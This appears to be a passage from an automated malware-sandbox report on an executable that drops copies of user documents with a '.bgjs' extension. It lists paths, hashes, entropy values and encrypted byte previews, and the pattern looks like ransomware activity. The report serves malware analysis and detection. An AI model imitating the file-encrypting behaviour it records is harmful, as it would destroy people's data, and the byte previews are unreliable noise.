                                                                                                                                      Preview:CZQKSh.:.Q,23.C`.?{g.w.`....:.<.<.x.[.l.46Q63.J.m.......Q.^.'.\...n..~.UEm3..^V.87.lP{..?2q..l.Hc....{-......^.;.&.X>.KF......!...m.N..F...U...K.$.8.~.........B?w.^ .i.......=EP(..a...FH!(O.X`......T...o...^.NY\.}...t.Q.U.=.n....A6T.Ou.:F..).d@.._......X...?......1<..G..>.mW.J.N...=.....w.4.>w.Gl2......:...}b...}g..........iQA.$.. ...*B..W....A..*-.(.h.J.=...E............f.Q........#..n...Ku.:J.+..,$.........A.)R......r.d.M... ...OH..... '&9e../.X..A...D..B.)...$hI.K...#..`E.x..c.".{9.....Q.^Z.<..%.c.W..Q..T....}.(.?W|[..E...~..]2$9..'.38}..>. .[f.!.g..B!.N......zf.7..U...-..........;.c.p...0(.t.K......y}.%.T.Q.....w...eZ=8....h>..K.....?.u..'..+.a..$..\.O.sR....z.N.Y.m.%.Ks..~5....jO...+.=E+..|1..a....1..x...b..N..L.5.....t...c.6$...;*....Y._...c.HL.f.n F...;"0..+..4...,...V.qc7|'a.}#.r..N;...`.\`..0.t..W..<6....D......&..".QJ...#..xs..q..k..\.}..0.f..`..x.B......W...L{.O.'Gz..`2.T}.2qX....VQ?..]..........&...S...kT..,q......!.].e.

                                                                                                                                      C:\Users\user\Documents\GLTYDMDUST.mp3

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.852515984420645
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:LrWjEO29IpTATUxIrhGr/I2puC0UMVizyrkjR7+/cMZYRyWC2imHqp5XbD:Le/zpTAmISZpp0SzTl7UTQETmKplD
                                                                                                                                      MD5:8167B645455190C5EC62794460C581C3
                                                                                                                                      SHA1:20EACA62CE74F1D8F3A6DAEBF9E7E486621C869E
                                                                                                                                      SHA-256:CE78812D5457D89E51DC1455D070EC7182731182D4D35C4D57C6ECC794404FA1
                                                                                                                                      SHA-512:514656F294551F032F11FF6740988D169E8D2738995B03CB59D57D8D2BB971FDFA0795A8C2977B559E330B1BA821CD2D5F6CCBA07A16AFF311FDD03AD0318B2A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD.u./....~...../.j..-.............z.VK....q...].....1T...O.{.....BJ.%.$.#.I.....h.]......}......oa...F."....}E.z}...w..IFb..:..i...5...r...5.t....V.....t......zx.....g&.(3..3n.....Y..k.{.f-..x...g.].....}].|....(s Q....".3AWNm.yk......b....sq`O..8........)D*..i.<1........]S+>..>......t.K....aO.i!...n....sl......2.2(........;...G........}.B......i..i..f....h.."b....o.N[..P.;..zd.8j..(.>..>.5......I...._..#......1.....H.HV..........)...$b.86......).'.j...."...z..b....q.*...H....*.y..u......Fa..../w.qv.CZ.Z#..h....9.WP....5B.rv=B.c./[4..:..>.~{.R..E..*.M.U...t..l...;c(.D...d/.h.*....w.A..q.i).3.}...S?^...Q.nD. ......-.PH...c...T...)......l..4N.n..i.'.`.~.Y..-......\:?.T.OY...d.z)}..........J.U...3~%!1D.D..*.A.p..U!.....t..V...T\...^..H......Z&1lS.j:..PS>......a.....}.D..).HM..'..eOP...6.Qf.......4WR,C....G..>~D.2.$.r.....!G.h...4.g.\,..{...=p{e........h75..D.!.....g....]M.....N.....6$;..Uu........?S.8'-..8.px~.....).].f......

                                                                                                                                      C:\Users\user\Documents\GLTYDMDUST.mp3.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.852515984420645
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:LrWjEO29IpTATUxIrhGr/I2puC0UMVizyrkjR7+/cMZYRyWC2imHqp5XbD:Le/zpTAmISZpp0SzTl7UTQETmKplD
                                                                                                                                      MD5:8167B645455190C5EC62794460C581C3
                                                                                                                                      SHA1:20EACA62CE74F1D8F3A6DAEBF9E7E486621C869E
                                                                                                                                      SHA-256:CE78812D5457D89E51DC1455D070EC7182731182D4D35C4D57C6ECC794404FA1
                                                                                                                                      SHA-512:514656F294551F032F11FF6740988D169E8D2738995B03CB59D57D8D2BB971FDFA0795A8C2977B559E330B1BA821CD2D5F6CCBA07A16AFF311FDD03AD0318B2A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD.u./....~...../.j..-.............z.VK....q...].....1T...O.{.....BJ.%.$.#.I.....h.]......}......oa...F."....}E.z}...w..IFb..:..i...5...r...5.t....V.....t......zx.....g&.(3..3n.....Y..k.{.f-..x...g.].....}].|....(s Q....".3AWNm.yk......b....sq`O..8........)D*..i.<1........]S+>..>......t.K....aO.i!...n....sl......2.2(........;...G........}.B......i..i..f....h.."b....o.N[..P.;..zd.8j..(.>..>.5......I...._..#......1.....H.HV..........)...$b.86......).'.j...."...z..b....q.*...H....*.y..u......Fa..../w.qv.CZ.Z#..h....9.WP....5B.rv=B.c./[4..:..>.~{.R..E..*.M.U...t..l...;c(.D...d/.h.*....w.A..q.i).3.}...S?^...Q.nD. ......-.PH...c...T...)......l..4N.n..i.'.`.~.Y..-......\:?.T.OY...d.z)}..........J.U...3~%!1D.D..*.A.p..U!.....t..V...T\...^..H......Z&1lS.j:..PS>......a.....}.D..).HM..'..eOP...6.Qf.......4WR,C....G..>~D.2.$.r.....!G.h...4.g.\,..{...=p{e........h75..D.!.....g....]M.....N.....6$;..Uu........?S.8'-..8.px~.....).].f......

                                                                                                                                      C:\Users\user\Documents\GLTYDMDUST.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.840592897356257
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ndNOCUJmVumC3/UKc8WUVlk4AD/vKRPvpk/gFvgvGlHmjYf9jrbD:dnVVum45Ypj0PRk/kHuYf9jPD
                                                                                                                                      MD5:95E9660B955261D2E12AFF5F8C61A4D5
                                                                                                                                      SHA1:E986A88CEADEA044661FE9572F4FD5E19CF1356D
                                                                                                                                      SHA-256:00743D6062BAC7A0CEB26D2D90A48C3410A6C3BFA1BCA71CBDD84512FA6CEAD4
                                                                                                                                      SHA-512:C48AEEA36E7472C1ABC90109B689241D73AEB88F2DDCBC80FC96BF48E2D46F1306882EB75D5772B880D4C38AFCC62732DF53123871BD0931A79C5CFB6EC2797B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYDY...r..3.Wq.m.".....Oh.`w'.`'[.$...)....^.j...@....3.....8.gj+....9)n.x...3?D..[C%lp....Nd....9+b.X..9.p$i.a.[}.V[....V.9.$..[.u.......d.8JjH.qU=..K..._...6N....(.\...g|..I...?\z...p8=.dn.(.r.FF..T....y<..k.6.........R....^S2.....hz.0V-.5..`fD..T.h.....Vf..C....)...!..N.....5...v)Knt.u.H.#.q.:^N..;>n......j4.....VxE.k8bW.X.zo>.......#.wv..R..Ih.."oB%.DEiR.}.zG.i.C~&..l.=0.g...Gm..B.X..A......YA.,../.K............7.D]\.zVUB.m..j.......'R.p..J.{.)..........5..hf.e..,W.<.&V.(.._..P...~..=1c..&.....ph .C.nL]h..#*.L..9.....fc.mW...E...3..W.!......`..~..._..]<.U+z.I...*~.c.k...06x.g.*..Y...%.....P.G8,....u...y....x..EX...d.?....j..4..&.>v`F.....{...;G.x8.....?A.ai.x..K=t[.]6.`.MO..Uo..._.GF....1..3Lci../..B......f...F.VE.,j...8..Ib..uhE\.%aU..C.kJ..I;.E......g...~..W.._.]..*....O.n.T.....R.??...7........8..>Tv.t.R....6..0*H.D.e..2..>M..w...`.\e.........'...U.}..g...X.J.5.o.S.L.o@.........A...{.41..,.....\.9..=#\...n..?...-oY7.

                                                                                                                                      C:\Users\user\Documents\GLTYDMDUST.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.840592897356257
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ndNOCUJmVumC3/UKc8WUVlk4AD/vKRPvpk/gFvgvGlHmjYf9jrbD:dnVVum45Ypj0PRk/kHuYf9jPD
                                                                                                                                      MD5:95E9660B955261D2E12AFF5F8C61A4D5
                                                                                                                                      SHA1:E986A88CEADEA044661FE9572F4FD5E19CF1356D
                                                                                                                                      SHA-256:00743D6062BAC7A0CEB26D2D90A48C3410A6C3BFA1BCA71CBDD84512FA6CEAD4
                                                                                                                                      SHA-512:C48AEEA36E7472C1ABC90109B689241D73AEB88F2DDCBC80FC96BF48E2D46F1306882EB75D5772B880D4C38AFCC62732DF53123871BD0931A79C5CFB6EC2797B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYDY...r..3.Wq.m.".....Oh.`w'.`'[.$...)....^.j...@....3.....8.gj+....9)n.x...3?D..[C%lp....Nd....9+b.X..9.p$i.a.[}.V[....V.9.$..[.u.......d.8JjH.qU=..K..._...6N....(.\...g|..I...?\z...p8=.dn.(.r.FF..T....y<..k.6.........R....^S2.....hz.0V-.5..`fD..T.h.....Vf..C....)...!..N.....5...v)Knt.u.H.#.q.:^N..;>n......j4.....VxE.k8bW.X.zo>.......#.wv..R..Ih.."oB%.DEiR.}.zG.i.C~&..l.=0.g...Gm..B.X..A......YA.,../.K............7.D]\.zVUB.m..j.......'R.p..J.{.)..........5..hf.e..,W.<.&V.(.._..P...~..=1c..&.....ph .C.nL]h..#*.L..9.....fc.mW...E...3..W.!......`..~..._..]<.U+z.I...*~.c.k...06x.g.*..Y...%.....P.G8,....u...y....x..EX...d.?....j..4..&.>v`F.....{...;G.x8.....?A.ai.x..K=t[.]6.`.MO..Uo..._.GF....1..3Lci../..B......f...F.VE.,j...8..Ib..uhE\.%aU..C.kJ..I;.E......g...~..W.._.]..*....O.n.T.....R.??...7........8..>Tv.t.R....6..0*H.D.e..2..>M..w...`.\e.........'...U.}..g...X.J.5.o.S.L.o@.........A...{.41..,.....\.9..=#\...n..?...-oY7.

                                                                                                                                      C:\Users\user\Documents\HMPPSXQPQV.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.889399879443539
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:3P/PvZSnX31j9LBqTCAAxRRe8UmaTN4Ekl5qRXT0eokebbL2wpE0Xej+Cfe6tpbD:3P/MX3bLhjcT0Ob0L2w2sej+C26tJD
                                                                                                                                      MD5:EE1F54E5A45C2871152EB9924FB95C3C
                                                                                                                                      SHA1:53699821F6A841C84E33AF29B44730E1EFC805F6
                                                                                                                                      SHA-256:12820048A796D382D8E5676B61D78446ABFC22BCFECCE30E90C3103360536466
                                                                                                                                      SHA-512:BD7A6DCA385424AFEEF6E70EB3DA51A74D7FB2E665DD3F0AF0FFC2027C7F37830432FB6D8E9969A5CA236D6624094B5BF11ACF04B6EB10ABF59C700D5A5E08B7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HMPPS.WEj(.s..- M.L:r.5s..L.["<...r...Ed.^Z.$U.....5X.X...B9q..+....t....dv......Om<.nAI..l_@.VJ.y.g..`..^W...^.F.T.7...Tq.... b...Pj..K..........IN.~'.........m..*h.....%.b....|......?...Y.g.z.r..#^...e}.!SV....F.../%...`.....]..Ko.IV.f").-[P|w.a..V."..: .E...Q_R....|..8....oM...Z...p..Ik. [T..Y<..a..,.5......./9q..v..~;....C.8.h..R..8.H....E.w....~~oX..q..0\.....Z...#D...+/...[.C..$0?...^]....,...Y)..*O.....j..'..../..7Kl..I~&..v.G...(zq../2Qx.....E...AW@@......nv.uF.[..".E.%...jo<.^f....U..DHf.).m.^.i....T....N...!..OJp......P.h. .DC.v/.......R.N.L...-....g.k..q...S.....G....x...!-.....b......4d4..-...V&.._.....=.-..R..............8...9Y.uv.c.......V....iL.;...U.t!....M..J.P..i.w5>V.\V.......2.....\.w.C.H....v..t-F6b.....%..../..O'V..p@....P.g..>...\.[..._.A....2 ~....\l[z........x@..t..c.....6Z.\....>..dx.d.lsp.n.U....8.....,.s.....E.!..x.f......2.EC.....Q.....&.ah.u1.z..%.J..A..T6Y,.`....y..hy.6.C. _.$6.s.#...&Y..;..=5N.t....G...up.a..t|V..B

                                                                                                                                      C:\Users\user\Documents\HMPPSXQPQV.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.889399879443539
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:3P/PvZSnX31j9LBqTCAAxRRe8UmaTN4Ekl5qRXT0eokebbL2wpE0Xej+Cfe6tpbD:3P/MX3bLhjcT0Ob0L2w2sej+C26tJD
                                                                                                                                      MD5:EE1F54E5A45C2871152EB9924FB95C3C
                                                                                                                                      SHA1:53699821F6A841C84E33AF29B44730E1EFC805F6
                                                                                                                                      SHA-256:12820048A796D382D8E5676B61D78446ABFC22BCFECCE30E90C3103360536466
                                                                                                                                      SHA-512:BD7A6DCA385424AFEEF6E70EB3DA51A74D7FB2E665DD3F0AF0FFC2027C7F37830432FB6D8E9969A5CA236D6624094B5BF11ACF04B6EB10ABF59C700D5A5E08B7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HMPPS.WEj(.s..- M.L:r.5s..L.["<...r...Ed.^Z.$U.....5X.X...B9q..+....t....dv......Om<.nAI..l_@.VJ.y.g..`..^W...^.F.T.7...Tq.... b...Pj..K..........IN.~'.........m..*h.....%.b....|......?...Y.g.z.r..#^...e}.!SV....F.../%...`.....]..Ko.IV.f").-[P|w.a..V."..: .E...Q_R....|..8....oM...Z...p..Ik. [T..Y<..a..,.5......./9q..v..~;....C.8.h..R..8.H....E.w....~~oX..q..0\.....Z...#D...+/...[.C..$0?...^]....,...Y)..*O.....j..'..../..7Kl..I~&..v.G...(zq../2Qx.....E...AW@@......nv.uF.[..".E.%...jo<.^f....U..DHf.).m.^.i....T....N...!..OJp......P.h. .DC.v/.......R.N.L...-....g.k..q...S.....G....x...!-.....b......4d4..-...V&.._.....=.-..R..............8...9Y.uv.c.......V....iL.;...U.t!....M..J.P..i.w5>V.\V.......2.....\.w.C.H....v..t-F6b.....%..../..O'V..p@....P.g..>...\.[..._.A....2 ~....\l[z........x@..t..c.....6Z.\....>..dx.d.lsp.n.U....8.....,.s.....E.!..x.f......2.EC.....Q.....&.ah.u1.z..%.J..A..T6Y,.`....y..hy.6.C. _.$6.s.#...&Y..;..=5N.t....G...up.a..t|V..B

                                                                                                                                      C:\Users\user\Documents\LFOPODGVOH.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.850795952090581
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:BKRKeFpDHoGEmpiDz3KScfrtulMB0dqu2uqivLDwkI0y7AxB6wCt6emZZp4I0bD:BKRToGEWbSchulMB04u2TSLDwR0y1w+n
                                                                                                                                      MD5:8EA60002F45A600B34CB5E7B6FB69DF4
                                                                                                                                      SHA1:9B67AD8AB38F7CAAA8D995FB4FED380713EF6AC6
                                                                                                                                      SHA-256:7E927A0FCB9FB8579BEE00B149A45795C76296F051C66D3FE786816E9A5C81BE
                                                                                                                                      SHA-512:F32E8969DA912858D9487D8919CA8ABEE6452149CAA19AC126155732CBD0BF0F618E9A29C2C4F81FF0406F4D181B348ED1294C38D22B4D395ACF5A6D38E436A5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LFOPO..6.{..)..sdp..3.B......... ...!jnJ...j.*%6j.M|.Pr...H.0..~..}.<..cd.g.......p.U...VSJk. ...q...6..w....@E..G...7Mx+..qg...}.q<.7......B..C}..8/...#:z.'.....,.2....?.3.]HoR>...T]i.Pdf.MH....v.6b..Q..G.or..........F.....e.....;........;.....Nf...H..}?_..g..J.R.......K.... ..9..RZ.WL/.Vx%.(.Y.N*.<.\L1.g.f.1S.'7.Q...].t..pi.......%..Lg.aT.Z.V.0#yZ.R.T..9K.....8...o.k..vLd.1E...l.T..,.....r...I.............UDo ..t....Xb..*D....&i...L.B^....7F.....%...].2...Z.^..cxQ....`....#....{......#p..w....s...........p.?.f[yY.K$.WI.ak.DS!..x[.I..L.2<.\...7....2...i..y.A5P...(.@.I./.L......=^.:.._.@..E.t....h.:Y,....\.@u`$N....;F.re~ki.f*.wcK..S..&.....c......WzrJ...l.hd....8...{7...W...q..dwo....Wt^.f.JZ..,..}W.v..q....I..E.n.w[.)L.\.^+..0.9.Q....."ol..hv........:R...?h....J.5...w......r`Q.V..........y.....#T .*.n<^.D`b(D4.I.~%...L....^.yd..n..7X......V...9`J.....g;+............._t.W.c.l...f..l..@.PC..^...b&.P.`...6qVY..."y.=.oq........t....XB.k

                                                                                                                                      C:\Users\user\Documents\LFOPODGVOH.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.850795952090581
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:BKRKeFpDHoGEmpiDz3KScfrtulMB0dqu2uqivLDwkI0y7AxB6wCt6emZZp4I0bD:BKRToGEWbSchulMB04u2TSLDwR0y1w+n
                                                                                                                                      MD5:8EA60002F45A600B34CB5E7B6FB69DF4
                                                                                                                                      SHA1:9B67AD8AB38F7CAAA8D995FB4FED380713EF6AC6
                                                                                                                                      SHA-256:7E927A0FCB9FB8579BEE00B149A45795C76296F051C66D3FE786816E9A5C81BE
                                                                                                                                      SHA-512:F32E8969DA912858D9487D8919CA8ABEE6452149CAA19AC126155732CBD0BF0F618E9A29C2C4F81FF0406F4D181B348ED1294C38D22B4D395ACF5A6D38E436A5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LFOPO..6.{..)..sdp..3.B......... ...!jnJ...j.*%6j.M|.Pr...H.0..~..}.<..cd.g.......p.U...VSJk. ...q...6..w....@E..G...7Mx+..qg...}.q<.7......B..C}..8/...#:z.'.....,.2....?.3.]HoR>...T]i.Pdf.MH....v.6b..Q..G.or..........F.....e.....;........;.....Nf...H..}?_..g..J.R.......K.... ..9..RZ.WL/.Vx%.(.Y.N*.<.\L1.g.f.1S.'7.Q...].t..pi.......%..Lg.aT.Z.V.0#yZ.R.T..9K.....8...o.k..vLd.1E...l.T..,.....r...I.............UDo ..t....Xb..*D....&i...L.B^....7F.....%...].2...Z.^..cxQ....`....#....{......#p..w....s...........p.?.f[yY.K$.WI.ak.DS!..x[.I..L.2<.\...7....2...i..y.A5P...(.@.I./.L......=^.:.._.@..E.t....h.:Y,....\.@u`$N....;F.re~ki.f*.wcK..S..&.....c......WzrJ...l.hd....8...{7...W...q..dwo....Wt^.f.JZ..,..}W.v..q....I..E.n.w[.)L.\.^+..0.9.Q....."ol..hv........:R...?h....J.5...w......r`Q.V..........y.....#T .*.n<^.D`b(D4.I.~%...L....^.yd..n..7X......V...9`J.....g;+............._t.W.c.l...f..l..@.PC..^...b&.P.`...6qVY..."y.=.oq........t....XB.k

                                                                                                                                      C:\Users\user\Documents\NWCXBPIUYI.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8527739217832995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:RZTdG3CW24zEslMHH59ERB4DrSxjBSYbgKhTH/Vx/uucQ1dabD:wyW3oZH5aRBkrIjNN9HX/2IYD
                                                                                                                                      MD5:6E2CFAFE5E3C548F7A4AA1E4553DB8EB
                                                                                                                                      SHA1:13AA27EEAF56FFD8ED4ECEB2D0C5D547F3AC9EAF
                                                                                                                                      SHA-256:FC7377E5C23E05150F6D7C2FA8AFCA1EE33FF08D1102D1BFC88913705F29BE5C
                                                                                                                                      SHA-512:C93678D78F8A6D91C43B3406893D543B6AEE200678AF53A4641EAD9DFB9E2E48FFE07E6541F74E438319C0C98E3D68613A4720865FBB31DBB50E46ACD155F2C0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB..1.H.Hxm.iP....f.O....3......L....B..c..?...!o..2...q.(M}1..L...]...z........k.9.L.n...$~X!R..{..;...j...q.....G....OH...<.qC!....Q...._sK.G.p......>.T5.X.H...M...k.B...l.}..n.w...$..^..Y.N<z.).s......w.a....~..aJ.iQ.iLR...mk.4..U.~.........h*..i}...8(!.P.:.pTw..C.6. E-c`>Yw.@.......a.w......y{].o.Z.)tCoj...u.v..i.w..DEF..q.......$sV{,A '....7~...n.z.......0....t.$s.....s#.|..]c...,..&|..]_...5#.._.....n..j.*...lF......z.,.h......}V<.hd...:lm.s.?w.s.........f.~#..L'.u...dK..'.....Y_...l(.|U..p.2.B...D._.y>9.M.._.w..$......{..X.CU1...K/..e..|@."..X.....e...M.w4.m/.W.....^.....(..3..vY...).-.W..c.4..E......uc\%.V.... (#I..`G..5.e.......L......Y.E5....B.^....n......!.CZH.M..8.1e......u.........O..(.Q.t..S.n...-O..#...DiVik:.T.3J.Y^8.......:B.w*...K!n......M.}..&....h[U..+I.E.*Ba......U>.......c.5.....S|.....V.#_..8...h......*...>... ...|.4+VB$(o....!..."..W.j..).......;E[:N.;...q/]{N.9...4d.8....n.F..+\.[2 .......Ck..y.........

                                                                                                                                      C:\Users\user\Documents\NWCXBPIUYI.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8527739217832995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:RZTdG3CW24zEslMHH59ERB4DrSxjBSYbgKhTH/Vx/uucQ1dabD:wyW3oZH5aRBkrIjNN9HX/2IYD
                                                                                                                                      MD5:6E2CFAFE5E3C548F7A4AA1E4553DB8EB
                                                                                                                                      SHA1:13AA27EEAF56FFD8ED4ECEB2D0C5D547F3AC9EAF
                                                                                                                                      SHA-256:FC7377E5C23E05150F6D7C2FA8AFCA1EE33FF08D1102D1BFC88913705F29BE5C
                                                                                                                                      SHA-512:C93678D78F8A6D91C43B3406893D543B6AEE200678AF53A4641EAD9DFB9E2E48FFE07E6541F74E438319C0C98E3D68613A4720865FBB31DBB50E46ACD155F2C0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB..1.H.Hxm.iP....f.O....3......L....B..c..?...!o..2...q.(M}1..L...]...z........k.9.L.n...$~X!R..{..;...j...q.....G....OH...<.qC!....Q...._sK.G.p......>.T5.X.H...M...k.B...l.}..n.w...$..^..Y.N<z.).s......w.a....~..aJ.iQ.iLR...mk.4..U.~.........h*..i}...8(!.P.:.pTw..C.6. E-c`>Yw.@.......a.w......y{].o.Z.)tCoj...u.v..i.w..DEF..q.......$sV{,A '....7~...n.z.......0....t.$s.....s#.|..]c...,..&|..]_...5#.._.....n..j.*...lF......z.,.h......}V<.hd...:lm.s.?w.s.........f.~#..L'.u...dK..'.....Y_...l(.|U..p.2.B...D._.y>9.M.._.w..$......{..X.CU1...K/..e..|@."..X.....e...M.w4.m/.W.....^.....(..3..vY...).-.W..c.4..E......uc\%.V.... (#I..`G..5.e.......L......Y.E5....B.^....n......!.CZH.M..8.1e......u.........O..(.Q.t..S.n...-O..#...DiVik:.T.3J.Y^8.......:B.w*...K!n......M.}..&....h[U..+I.E.*Ba......U>.......c.5.....S|.....V.#_..8...h......*...>... ...|.4+VB$(o....!..."..W.j..).......;E[:N.;...q/]{N.9...4d.8....n.F..+\.[2 .......Ck..y.........

                                                                                                                                      C:\Users\user\Documents\NWCXBPIUYI.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.847971701331372
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:TNCnErHwMt3xvvcBMUG5LybjT/ehbmOJJxTlN/zgViTxW9/9GXTYPdPjFZndoB/0:A05BX8G5+bmbh3/zgVkxWF9bbTnmdkfF
                                                                                                                                      MD5:263FC5436BB2D191FC58289FFD901D67
                                                                                                                                      SHA1:AAAB1D4368A2EF3130704C5E0893E2D4B257C382
                                                                                                                                      SHA-256:9942442181AB61E762E9FF4821FD57ABC05301C5565D8685A1EA82947794273F
                                                                                                                                      SHA-512:07136B660DFF17B5AFA4326A015E071A6B955E34E874982EEB6FA4EEE22B6CCA54A52F0E30B95667834283D0F3B7D5E93D645E935026710E3F01E821CC07E26E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB....Q.Hn.:.w.J...R..\j\Jz7`.....wj.f.J...\r...H....d..@1y..g.....Vl^M.lT....f.K....u;.PDJq......:...B.1f..{%..y..g....:z.,......Xg.M..*.....o...5.....N(0..BW.&qhW.|p[.3.}...e...K.w.QV...=.Ft..p.'.Z1..PT.y[..|2\...M...v.WCA^....(...s..W.6j.CdX+^.}d\.....q...K..%C{........M...?.f..}....+.....Y..t.G....=..Bv.I1...o!m..s5..V.....o.I.@.F+b.e..+p!...O.c..`Er..9.......5...$.]..&.e.Z.....+.I9....YX.w.!...~...NZ.b....k_.-.....>x=...,..>>....2..V...J_..u.m.......h.T..9R\.....+..|0a....,.V...JS_H.._=...Q.<..i...=_.&..tI;x.HHs.........P......o._dIK-....pj.6k........C..\.i.-d.d.|.6M..^tm).K".|O..,.EJ.b:...]].........U...~..\.l...T..&c.zq...W..T5.FL......;&....<....o.T......2e1.."51....l.E..Os-Dh.....~.a..o.\..........I\y..[.ZK.S|.X....i..G...?.,.r.....Z_y:C.....q..5<|.IIl..I,.GCeF8..R...w+.....vD..p. c......C......].;_....{.N...g.e...&.....r..5q....m....=...V.H.#n..B+.."|#....3,.<n..]..A.7....}..dWi...%p...#$..{.fDd.L..P......j.Z..qQ.D{*.....V.

                                                                                                                                      C:\Users\user\Documents\NWCXBPIUYI.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.847971701331372
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:TNCnErHwMt3xvvcBMUG5LybjT/ehbmOJJxTlN/zgViTxW9/9GXTYPdPjFZndoB/0:A05BX8G5+bmbh3/zgVkxWF9bbTnmdkfF
                                                                                                                                      MD5:263FC5436BB2D191FC58289FFD901D67
                                                                                                                                      SHA1:AAAB1D4368A2EF3130704C5E0893E2D4B257C382
                                                                                                                                      SHA-256:9942442181AB61E762E9FF4821FD57ABC05301C5565D8685A1EA82947794273F
                                                                                                                                      SHA-512:07136B660DFF17B5AFA4326A015E071A6B955E34E874982EEB6FA4EEE22B6CCA54A52F0E30B95667834283D0F3B7D5E93D645E935026710E3F01E821CC07E26E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB....Q.Hn.:.w.J...R..\j\Jz7`.....wj.f.J...\r...H....d..@1y..g.....Vl^M.lT....f.K....u;.PDJq......:...B.1f..{%..y..g....:z.,......Xg.M..*.....o...5.....N(0..BW.&qhW.|p[.3.}...e...K.w.QV...=.Ft..p.'.Z1..PT.y[..|2\...M...v.WCA^....(...s..W.6j.CdX+^.}d\.....q...K..%C{........M...?.f..}....+.....Y..t.G....=..Bv.I1...o!m..s5..V.....o.I.@.F+b.e..+p!...O.c..`Er..9.......5...$.]..&.e.Z.....+.I9....YX.w.!...~...NZ.b....k_.-.....>x=...,..>>....2..V...J_..u.m.......h.T..9R\.....+..|0a....,.V...JS_H.._=...Q.<..i...=_.&..tI;x.HHs.........P......o._dIK-....pj.6k........C..\.i.-d.d.|.6M..^tm).K".|O..,.EJ.b:...]].........U...~..\.l...T..&c.zq...W..T5.FL......;&....<....o.T......2e1.."51....l.E..Os-Dh.....~.a..o.\..........I\y..[.ZK.S|.X....i..G...?.,.r.....Z_y:C.....q..5<|.IIl..I,.GCeF8..R...w+.....vD..p. c......C......].;_....{.N...g.e...&.....r..5q....m....=...V.H.#n..B+.."|#....3,.<n..]..A.7....}..dWi...%p...#$..{.fDd.L..P......j.Z..qQ.D{*.....V.

                                                                                                                                      C:\Users\user\Documents\NYMMPCEIMA.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
